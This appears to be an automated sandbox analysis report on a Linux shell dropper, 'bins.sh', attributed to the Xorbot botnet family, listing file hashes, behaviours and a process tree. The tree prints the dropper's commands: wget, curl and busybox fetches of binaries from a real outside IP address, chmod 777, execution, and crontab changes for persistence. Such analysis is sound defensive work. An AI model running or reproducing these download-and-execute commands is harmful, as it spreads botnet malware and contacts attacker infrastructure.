Analysis
max time kernel: 149s
max time network: 158s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 04-12-2024 08:55
Static task: static1
Behavioral task: behavioral1 (sample: bins.sh, resource: ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (sample: bins.sh, resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (sample: bins.sh, resource: debian9-mipsbe-20240611-en)
Behavioral task: behavioral4 (sample: bins.sh, resource: debian9-mipsel-20240226-en)
General
Target: bins.sh
Size: 10KB
MD5: ef3b5b8d03ad9b64895750001a9a9f81
SHA1: 67905e0b7ab0f9251c5591a53ab0efbfbe4aba7e
SHA256: cd567b9f3db24e8d535579d9dc2205d9730046834635074acae74277fe2460de
SHA512: d3430b5354703e133e906aa7f15d186f6c5d79914f465decabb603b16269e41a7ee63647e3209ecd66c7fd619266a50b6de934825d1cbc9becc66c20398c529f
SSDEEP: 96:LVc68OcK8INtzVZ7Tjl9P3/Mwyq+zVc68OcK8INuFS0AVhX7DE7PneP3/Mw0q+s+:LxzVZvjl9P3/MwyjVc2P3/Mw6
Malware Config
Signatures
Xorbot family
Processes:
  resource                           yara_rule
  behavioral2/files/fstream-1.dat    family_xorbot
  behavioral2/files/fstream-6.dat    family_xorbot
File and Directory Permissions Modification (1 TTPs, 2 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes:
  pid   Process
  689   chmod
  703   chmod
Executes dropped EXE (2 IoCs)
Processes:
  ioc                                        pid   Process
  /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj    690   OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
  /tmp/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6    706   YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
Renames itself (1 IoCs)
Processes:
  pid   Process
  691   OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
Creates/modifies Cron job (1 TTPs, 1 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
  description                    ioc                                    Process
  File opened for modification   /var/spool/cron/crontabs/tmp.7yAWuu    crontab
Enumerates running processes
Discovers information about currently running processes on the system.
Checks CPU configuration (1 TTPs, 1 IoCs)
Checks CPU information that indicates whether the system is a virtual machine.
Processes:
  description                ioc             Process
  File opened for reading    /proc/cpuinfo   curl
Reads runtime system information
Processes: OXVxT5hUBFD9egbouowK0UOvExtshC3jGj, curl, crontab
Writes file to tmp directory (4 IoCs)
Malware often drops required files in the /tmp directory.
Processes:
  description                    ioc                                        Process
  File opened for modification   /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj    busybox
  File opened for modification   /tmp/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6    busybox
  File opened for modification   /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj    wget
  File opened for modification   /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj    curl
Processes
PID 658  /tmp/bins.sh  cmdline: /tmp/bins.sh
  PID 662  /bin/rm  cmdline: /bin/rm bins.sh
  PID 665  /usr/bin/wget  cmdline: wget http://216.126.231.240/bins/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
    - Writes file to tmp directory
  PID 680  /usr/bin/curl  cmdline: curl -O http://216.126.231.240/bins/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  PID 687  /bin/busybox  cmdline: /bin/busybox wget http://216.126.231.240/bins/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
    - Writes file to tmp directory
  PID 689  /bin/chmod  cmdline: chmod 777 OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
    - File and Directory Permissions Modification
  PID 690  /tmp/OXVxT5hUBFD9egbouowK0UOvExtshC3jGj  cmdline: ./OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
    - Executes dropped EXE
    - Renames itself
    - Reads runtime system information
    PID 692  /bin/sh  cmdline: sh -c "crontab -l"
      PID 693  /usr/bin/crontab  cmdline: crontab -l
    PID 694  /bin/sh  cmdline: sh -c "crontab -"
      PID 695  /usr/bin/crontab  cmdline: crontab -
        - Creates/modifies Cron job
        - Reads runtime system information
  PID 697  /bin/rm  cmdline: rm OXVxT5hUBFD9egbouowK0UOvExtshC3jGj
  PID 700  /usr/bin/wget  cmdline: wget http://216.126.231.240/bins/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
  PID 701  /usr/bin/curl  cmdline: curl -O http://216.126.231.240/bins/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
  PID 702  /bin/busybox  cmdline: /bin/busybox wget http://216.126.231.240/bins/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
    - Writes file to tmp directory
  PID 703  /bin/chmod  cmdline: chmod 777 YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
    - File and Directory Permissions Modification
  PID 706  /tmp/YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6  cmdline: ./YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
    - Executes dropped EXE
  PID 708  /bin/rm  cmdline: rm YgNxYZKlv3u6xMFEhctcheQmfJyTlw12G6
  PID 709  /usr/bin/wget  cmdline: wget http://216.126.231.240/bins/a0wubK2TzV0i7LK0iHvF93vpMmsRUZHzE9
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 119KB
MD5: 1b166b95f9cb4b079ef1b9ec8363ddf3
SHA1: 0d8eb08add467b3b5474f9b25909297fe7c2839c
SHA256: 94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512: 983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

Filesize: 112KB
MD5: 05d7857dcead18bbd86d2935f591873c
SHA1: 34d18f41ef35f93d5364ce3e24d74730a4e91985
SHA256: 2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512: d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

Filesize: 210B
MD5: bbbc4f15a2c110ddc72656ce1f4d9609
SHA1: 8bafc9e8b75f9d98e7cbf8993ef8f9532c7410b5
SHA256: 6e92c9008fc5f4bd4db14914fe85c82feef5abce992396640a4cea621b2bd5e7
SHA512: 7f3af90986bb977bca6471e54a4b97e7ec9a06e6b5212bda65cae59aac8512475dfb1c65cb0e3c53a83c6b18e880f8c793a8b08871a998239c149b0d1d97a1c6